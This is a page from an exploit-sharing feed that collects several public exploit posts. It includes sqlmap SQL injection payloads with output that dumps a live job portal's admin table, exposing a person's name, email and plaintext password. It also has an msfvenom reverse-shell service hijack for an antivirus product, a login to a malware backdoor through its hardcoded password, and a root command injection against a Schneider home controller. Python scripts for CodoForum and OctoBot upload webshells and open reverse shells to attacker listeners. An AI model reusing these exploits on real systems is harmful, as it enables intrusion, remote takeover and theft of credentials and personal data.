Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : wvidesk.com │ │ │ │ Vendor : WVIDesk │ │ │ │ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │ │ Resume Builder v. 1.0 │ │ events and scholarships. │ │ Vuln Type: Remote SQL Injection │ │ │ │ Method : GET │ │ │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'listed' is vulnerable. --- Parameter: listed (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))# --- [+] Starting the Attack sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache, PHP 5.6.40 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [23:03:36] [INFO] fetching current database [23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers' current database: 'livexzfv_jobdreamers' fetching tables for database: 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers [56 tables] +---------------------+ | adminMenu | | applyajob | | candidatefeedback | | candidatelogin | | candidateview | | clickcount | | controlall | | controlcategory | | coursecategory | | courseinstitute | | coursevisitsite | | eventcategory | | eventtype | | jobagentcountry | | jobalert | | jobcategory | | jobcity | | jobcompanyinfo | | jobcontinent | | jobcountry | | jobeducationsubject | | jobindustry | | jobmessage | | jobpostingprice | | jobquestion | | jobseniority | | jobuniversity | | jobusermaster | | jobusertype | | jobvisitsite | | mainmenu | | postacourse | | postaevent | | postajob | | postascholarship | | resumeaward | | resumecarsum | | resumecertificate | | resumecomment | | resumeeducation | | resumelanguage | | resumeprofessional | | resumepublication | | resumeresearch | | resumeskill | | resumesumexp | | resumetraining | | resumework | | scholarshipperiod | | seeker_profile | | seekers_admin | | siteAdmin | | siteadminuser | | tbl_countries | | tblpage | | userrole | +---------------------+ fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers Table: siteadminuser [8 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | aflag | varchar(2) | | desig | varchar(200) | | enet | varchar(450) | | fullname | varchar(450) | | id | int(10) | | pw | varchar(25) | | role | int(10) | | users | varchar(200) | +----------+--------------+ fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers Table: siteadminuser [1 entry] +-------+------------+--------------------+------------------------+----+------+------+-------+ | aflag | desig | enet | fullname | id | pw | role | users | +-------+------------+--------------------+------------------------+----+------+------+-------+ | Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir | +-------+------------+--------------------+------------------------+----+------+------+-------+ [-] Done </code></pre>

<pre><code>[+] Credits: Yehia Elghaly (aka Mrvar0x) [+] Website: https://mrvar0x.com/ [+] Source: https://mrvar0x.com/2022/07/21/pcprotect-endpoint-tampering-exploit/ Vendor: ============= www.pcprotect.com Product: =========== PCProtect Endpoint Protection v5.17.470 PCProtect is a malware detection and antivirus scanner. It uses advanced heuristics and a massive, continuously updated database to detect malware files on Windows, macOS, and Android devices. It also has an iOS app. PCProtect also includes additional features, including: Web shield - Virtual private network (VPN) - Data breach monitor - Identity theft protection - System optimizer- Password manager- And much more… Vulnerability Type: =================== Missing Tamper Protection Incorrect Authorization CVE Reference: ============== N/A Security Issue: ================ PCProtect Antivirus prior to version 5.17.470 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling PCProtect Antivirus and the protection offered by it. Also It lead to Raised privilege to SYSTEM. That can occurred by modifying a specific registry key. Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityService Change ImagePath path to a malicious executable. Exploit/POC: ============= Create malicious executable through msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe Modify (ImagePath) with the path of the malicious executable - Restart Network Access: =============== Local Severity: ========= High [+] Disclaimer The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). Mrvar0x </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/8b470931114527b4dce42034a95ebf46.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Eclipse.h Vulnerability: Weak Hardcoded Credentials Family: Eclipse Type: PE32 MD5: 8b470931114527b4dce42034a95ebf46 Vuln ID: MVID-2022-0625 Disclosure: 07/21/2022 Description: The malware listens on TCP port 6210 and authentication is required. However, the backdoor accepts any USER name for authentication and the password "R-M" is weak and hardcoded within the PE file. Unpacking the UPX packed executable, easily reveals the cleartext hardcoded password. 00437590 dd 3 ; Len 00437590 db 'R-M',0 ; Text 0043759C _str_6210 dd 0FFFFFFFFh ; _top Exploit/PoC: C:\>nc64.exe 192.168.18.125 6210 220 Servidor FTP Temporal Ver. 2.1 por Vlad USER malvuln 331 Password required for malvuln. PASS R-M 230 User malvuln logged in. SYST 215 UNIX Type: L8 Internet Component Suite MKD HATE 257 'C:\HATE': directory created. CWD HATE 250 CWD command successful. "C:/HATE/" is current directory. PASV 227 Entering Passive Mode (192,168,18,125,213,228). STOR DOOM_SM.exe 150 Opening data connection for DOOM_SM.exe. 226 File received ok from socket import * MALWARE_HOST="192.168.18.125" PORT=54756 DOOM="DOOM_SM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code><#SpaceLogic.ps1 Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit Vendor: Schneider Electric SE Product web page: https://www.se.com https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/ https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware Affected version: SpaceLogic C-Bus Home Controller (5200WHC2) formerly known as C-Bus Wiser Home Controller MK2 V1.31.460 and prior Firmware: 604 Summary: SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants. Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide! The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains. Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls. Desc: The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam. ========================================================= /www/delsnap.pl: ---------------- 01: #!/usr/bin/perl 02: use IO::Handle; 03: 04: 05: select(STDERR); 06: $| = 1; 07: select(STDOUT); 08: $| = 1; 09: 10: #print "\r\n\r\n"; 11: 12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/'; 13: use CGI; 14: 15: my $PROGNAME = "delsnap.pl"; 16: 17: my $cgi = new CGI(); 18: 19: my $name = $cgi->param('name'); 20: if ($name eq "list") { 21: print "\r\n\r\n"; 22: print "DATA="; 23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`; 24: exit(0); 25: } 26: if ($name eq "deleteall") { 27: print "\r\n\r\n"; 28: print "DELETINGALL=TRUE&"; 29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`; 30: print "COMPLETED=true\n"; 31: exit(0); 32: } 33: #print "name $name\n"; 34: print "\r\n\r\n"; 35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name"; 36: 37: unlink $filename or die "COMPLETED=false\n"; 38: 39: print "COMPLETED=true\n"; ========================================================= Tested on: Machine: OMAP3 Wiser2 Board CPU: ARMv7 revision 2 GNU/Linux 2.6.37 (armv7l) BusyBox v1.22.1 thttpd/2.25b Perl v5.20.0 Clipsal 81 Angstrom 2009.X-stable PICED 4.14.0.100 lighttpd/1.7 GCC 4.4.3 NodeJS v10.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5710 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf CVE ID: CVE-2022-34753 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753 27.03.2022 #> $host.UI.RawUI.ForegroundColor = "Green" if ($($args.Count) -ne 2) { Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n") } else { $ip = $args[0] $cmd = $args[1] $cmdinj = "/delsnap.pl?name=|$cmd" Write-Host("`nSending command '$cmd' to $ip`n") #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj curl -v $ip$cmdinj } <#PoC PS C:\> .\SpaceLogic.ps1 Usage: .\SpaceLogic.ps1 [IP] [CMD] PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd" Sending command 'uname -a;id;pwd' to 192.168.1.2 VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload VERBOSE: received 129-byte response of content type text/html; charset=utf-8 StatusCode : 200 StatusDescription : OK Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux uid=0(root) gid=0(root) /custom-package RawContent : HTTP/1.1 200 OK Access-Control-Allow-Origin: * Connection: keep-alive Content-Length: 129 Content-Type: text/html; charset=utf-8 Date: Thu, 30 Jun 2022 14:48:43 GMT ETag: W/"81-LTIWJvYlDBYAlgXEy... Forms : {} Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; charset=utf-8]...} Images : {} InputFields : {} Links : {} ParsedHtml : mshtml.HTMLDocumentClass RawContentLength : 129 PS C:\> #> </code></pre>

<pre><code># Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE) # Date: 06/07/2022 # Exploit Author: Krish Pandey (@vikaran101) # Vendor Homepage: https://codoforum.com/ # Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip # Version: CodoForum v5.1 # Tested on: Ubuntu 20.04 # CVE: CVE-2022-31854 #!/usr/bin/python3 import requests import time import optparse import random import string banner = """ ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | | | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _| \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| """ print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)") print(banner) print("\nExploit found and written by: @vikaran101\n") parser = optparse.OptionParser() parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install') parser.add_option('-u', '--username', action="store", dest='username', help='admin username') parser.add_option('-p', '--password', action="store", dest='password', help='admin password') parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address') parser.add_option('-n', '--port', action="store", dest='port', help='listener port number') options, args = parser.parse_args() proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} if not options.target or not options.username or not options.password or not options.ip or not options.port: print("[-] Missing arguments!") print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]") print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help") exit() loginURL = options.target + '/admin/?page=login' globalSettings = options.target + '/admin/index.php?page=config' payloadURL = options.target + '/sites/default/assets/img/attachments/' session = requests.Session() randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10))) def getPHPSESSID(): try: get_PHPID = session.get(loginURL) headerDict = get_PHPID.headers cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1] return cookies except: exit() phpID = getPHPSESSID() def login(): send_cookies = {'cf':'0'} send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'} send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--" auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy) if "CODOFORUM | Dashboard" in auth.text: print("[+] Login successful") def uploadAndExploit(): send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID} send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'} send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n' exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy) print("[*] Checking webshell status and executing...") payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy) if payloadExec.status_code == 200: print("[+] Payload uploaded successfully and executed, check listener") else: print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])") login() uploadAndExploit() </code></pre>

<pre><code># Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) # Date: 9/2/2021 # Exploit Author: Samy Younsi, Thomas Knudsen # Vendor Homepage: https://www.octobot.online/ # Software Link: https://github.com/Drakkar-Software/OctoBot # Version: 0.4.0beta3 - 0.4.3 # Tested on: Linux (Ubuntu, CentOs) # CVE : CVE-2021-36711 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import zipfile import time import sys import os def banner(): sashimiLogo = """ _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | _ _ _ _ \^^^^ == \_/ | | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. | / __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / | \__ | (_| \__ | | | | | | | | | | ||/ \_ \| / ( /\__,_( |_| |_|_|_| |_| |_|_| \________/ |_| |_| \033[1;91mOctoBot Killer\033[1;m Author: \033[1;92mNaqwada\033[1;m RuptureFarm 1029 FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(sashimiLogo)) def help(): print('[!] \033[1;93mUsage: \033[1;m') print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0])) print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.') def getOctobotVersion(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/api/version'.format(RHOST, RPORT) else: url = 'http://{}:{}/api/version'.format(RHOST, RPORT) return curl(url) def restartOctobot(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT) else: url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT) try: requests.get(url, allow_redirects=False, verify=False, timeout=1) except requests.exceptions.ConnectionError as e: print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m') time.sleep(30) def downloadTentaclePackage(octobotVersion): print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion)) url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion) result = requests.get(url, stream=True) with open('{}.zip'.format(octobotVersion), 'wb') as fd: for chunk in result.iter_content(chunk_size=128): fd.write(chunk) print('[+] \033[1;92mDownload completed!\033[1;m') def unzipTentaclePackage(octobotVersion): zip = zipfile.ZipFile('{}.zip'.format(octobotVersion)) zip.extractall('quests') os.remove('{}.zip'.format(octobotVersion)) print('[+] \033[1;92mTentacle package has been extracted.\033[1;m') def craftBackdoor(octobotVersion): print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion)) path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/' injectInitFile(path) injectMetadataFile(path) print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion)) def injectMetadataFile(path): with open('{}metadata.py'.format(path),'r') as metadataFile: content = metadataFile.read() addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty')) addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")')) with open('{}metadata.py'.format(path),'w') as newMetadataFile: newMetadataFile.write(addPayload) def injectInitFile(path): with open('{}__init__.py'.format(path),'r') as initFile: content = initFile.read() addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,')) addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",')) with open('{}__init__.py'.format(path),'w') as newInitFile: newInitFile.write(addPayload) def rePackTentaclePackage(): print('[+] \033[1;92mRepacking Tentacle package.\033[1;m') with zipfile.ZipFile('any_platform.zip', mode='w') as zipf: len_dir_path = len('quests') for root, _, files in os.walk('quests'): for file in files: file_path = os.path.join(root, file) zipf.write(file_path, file_path[len_dir_path:]) def uploadMaliciousTentacle(): print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m') file = { 'file': open('any_platform.zip', 'rb'), } response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60) zipLink = response.json()['data']['file']['url']['full'] response = requests.get(zipLink, timeout=60) soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') zipLink = soup.find(id='download-url').get('href') print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink)) return zipLink def curl(url): response = requests.get(url, allow_redirects=False, verify=False, timeout=60) return response def injectBackdoor(RHOST, RPORT, zipLink): print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m') if RPORT == 443: url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) else: url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', } data = '{"'+zipLink+'":"register_and_install"}' response = requests.post(url, headers=headers, data=data) response = response.content.decode('utf-8').replace('"', '').strip() os.remove('any_platform.zip') if response != 'Tentacles installed': print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m') exit() print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m') def execReverseShell(RHOST, RPORT, LHOST, LPORT): print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT)) if RPORT == 443: url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) else: url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) return curl(url) def isPassword(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}'.format(RHOST, RPORT) else: url = 'http://{}:{}'.format(RHOST, RPORT) return curl(url) def main(): banner() args = parser.parse_args() if isPassword(args.RHOST, args.RPORT).status_code != 200: print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m') octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','') if len(octobotVersion) > 0: print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion)) downloadTentaclePackage(octobotVersion) unzipTentaclePackage(octobotVersion) craftBackdoor(octobotVersion) rePackTentaclePackage() zipLink = uploadMaliciousTentacle() injectBackdoor(args.RHOST, args.RPORT, zipLink) restartOctobot(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False) parser.add_argument('-h', '--help', help=help()) parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main() </code></pre>